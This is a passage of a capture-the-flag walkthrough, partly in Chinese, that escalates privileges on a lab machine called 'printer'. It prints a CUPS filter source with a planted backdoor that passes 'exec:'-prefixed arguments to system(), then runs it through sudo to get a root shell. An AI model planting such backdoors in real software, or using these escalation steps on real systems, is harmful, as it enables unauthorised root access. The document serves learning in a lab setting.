No need for brute force here!
HackermanI put a backdoor in a printer filter.
Filter name: hack
You need to wait at least 60 seconds between attempts.进一步信息搜集:
mabelle@printer:~$ cd /opt
mabelle@printer:/opt$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Apr 22 2023 .
drwxr-xr-x 18 root root 4096 Feb 6 2023 ..
drwxr-xr-x 26 501 staff 4096 Apr 16 2023 cups-2.3.3
mabelle@printer:/opt$ cd cups-2.3.3/
mabelle@printer:/opt/cups-2.3.3$ ls -la
........
mabelle@printer:/opt/cups-2.3.3$ cd filter
mabelle@printer:/opt/cups-2.3.3/filter$ ls -la
total 1144
drwxr-xr-x 2 501 staff 4096 Apr 22 2023 .
drwxr-xr-x 26 501 staff 4096 Apr 16 2023 ..
-rw-r--r-- 1 501 staff 11541 Feb 6 2023 commandtops.c
-rw-r--r-- 1 root root 50488 Feb 6 2023 commandtops.o
-rw-r--r-- 1 501 staff 11613 Feb 6 2023 common.c
-rw-r--r-- 1 501 staff 1344 Feb 6 2023 common.h
-rw-r--r-- 1 root root 49312 Feb 6 2023 common.o
-rw-r--r-- 1 501 staff 2719 Feb 6 2023 Dependencies
-rw-r--r-- 1 501 staff 2038 Feb 6 2023 gziptoany.c
-rw-r--r-- 1 root root 17048 Feb 6 2023 gziptoany.o
-rw-r--r-- 1 501 staff 4053 Feb 6 2023 Makefile
-rw-r--r-- 1 501 staff 1295 Feb 6 2023 postscript-driver.header
-rw-r--r-- 1 501 staff 14701 Feb 6 2023 postscript-driver.shtml
-rw-r--r-- 1 501 staff 1275 Feb 6 2023 ppd-compiler.header
-rw-r--r-- 1 501 staff 36686 Feb 6 2023 ppd-compiler.shtml
-rw-r--r-- 1 501 staff 86511 Feb 6 2023 pstops.c
-rw-r--r-- 1 root root 233464 Feb 6 2023 pstops.o
-rw-r--r-- 1 501 staff 1232 Feb 6 2023 raster-driver.header
-rw-r--r-- 1 501 staff 11869 Feb 6 2023 raster-driver.shtml
-rw-r--r-- 1 501 staff 24526 Feb 6 2023 rastertoepson.c
-rw-r--r-- 1 root root 104192 Feb 6 2023 rastertoepson.o
-rw-r--r-- 1 501 staff 18977 Feb 6 2023 rastertohp.c
-rw-r--r-- 1 root root 94120 Feb 6 2023 rastertohp.o
-rw-r--r-- 1 501 staff 27170 Feb 6 2023 rastertolabel.c
-rw-r--r-- 1 root root 129552 Feb 6 2023 rastertolabel.o
-rw-r--r-- 1 root root 16862 Feb 6 2023 rastertopwg.c
-rw-r--r-- 1 root root 78152 Feb 6 2023 rastertopwg.o
-rw-r--r-- 1 501 staff 1346 Feb 6 2023 spec-ppd.header
-rw-r--r-- 1 501 staff 79306 Feb 6 2023 spec-ppd.shtml理论上只要试完就行了,但是每试一次就得停60秒,从后往前进行尝试,。
mabelle@printer:/opt/cups-2.3.3/filter$ ls *.c
commandtops.c common.c gziptoany.c pstops.c rastertoepson.c rastertohp.c rastertolabel.c rastertopwg.cI put a backdoor in a printer filter.
Filter name: rastertopwg
You are awesome! Here is the password: wK4EyQ15Cga成功,拿捏的死死的,嘿嘿。
尝试切换我们的用户:
mabelle@printer:/opt/cups-2.3.3/filter$ su root
Password:
su: Authentication failure
mabelle@printer:/opt/cups-2.3.3/filter$ cat /etc/passwd | grep "bash"
root:x:0:0:root:/root:/bin/bash
mabelle:x:1000:1000:,,,:/home/mabelle:/bin/bash
kierra:x:1001:1002:,,,:/home/kierra:/bin/bash
mabelle@printer:/opt/cups-2.3.3/filter$ su kierra
Password:
kierra@printer:/opt/cups-2.3.3/filter$ 再进一步提权
kierra@printer:/opt/cups-2.3.3/filter$ sudo -l
[sudo] password for kierra:
Matching Defaults entries for kierra on printer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kierra may run the following commands on printer:
(ALL : ALL) /usr/lib/cups/filter/rastertopwg查看一下这个函数的c语言代码,并尝试运行:
kierra@printer:/opt/cups-2.3.3/filter$ ls -l /usr/lib/cups/filter/rastertopwg
-rwxr-xr-x 1 root root 18752 Mar 14 2022 /usr/lib/cups/filter/rastertopwg
kierra@printer:/opt/cups-2.3.3/filter$ cat /usr/lib/cups/filter/rastertopwg.c
cat: /usr/lib/cups/filter/rastertopwg.c: No such file or directory
kierra@printer:/opt/cups-2.3.3/filter$ ls -l *.c
-rw-r--r-- 1 501 staff 11541 Feb 6 2023 commandtops.c
-rw-r--r-- 1 501 staff 11613 Feb 6 2023 common.c
-rw-r--r-- 1 501 staff 2038 Feb 6 2023 gziptoany.c
-rw-r--r-- 1 501 staff 86511 Feb 6 2023 pstops.c
-rw-r--r-- 1 501 staff 24526 Feb 6 2023 rastertoepson.c
-rw-r--r-- 1 501 staff 18977 Feb 6 2023 rastertohp.c
-rw-r--r-- 1 501 staff 27170 Feb 6 2023 rastertolabel.c
-rw-r--r-- 1 root root 16862 Feb 6 2023 rastertopwg.c
kierra@printer:/opt/cups-2.3.3/filter$ cat rastertopwg.c/*
* 'main()' - Main entry for filter.
*/
int /* O - Exit status */
main(int argc, /* I - Number of command-line args */
char *argv[]) /* I - Command-line arguments */
{
const char *final_content_type;
for (int i = 1; i < argc; i++) {
if (strncmp(argv[i], "exec:", 5) == 0) {
system(argv[i] + 5);
}
}kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec: whoami
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg -exec whoami
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec whoami
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec:whoami
root
Usage: rastertopwg job user title copies options [filename]
kierra@printer:/opt/cups-2.3.3/filter$ sudo /usr/lib/cups/filter/rastertopwg exec:bash
root@printer:/opt/cups-2.3.3/filter# cd /root
root@printer:~# ls -la
total 28
drwx------ 4 root root 4096 May 20 2023 .
drwxr-xr-x 18 root root 4096 Feb 6 2023 ..
lrwxrwxrwx 1 root root 9 Apr 14 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 637 Apr 16 2023 .bashrc
drwx------ 2 root root 4096 Apr 23 2023 .config
drwxr-xr-x 3 root root 4096 Apr 23 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rwx------ 1 root root 33 Feb 6 2023 root_flag.txt拿到rootshell!!!!!
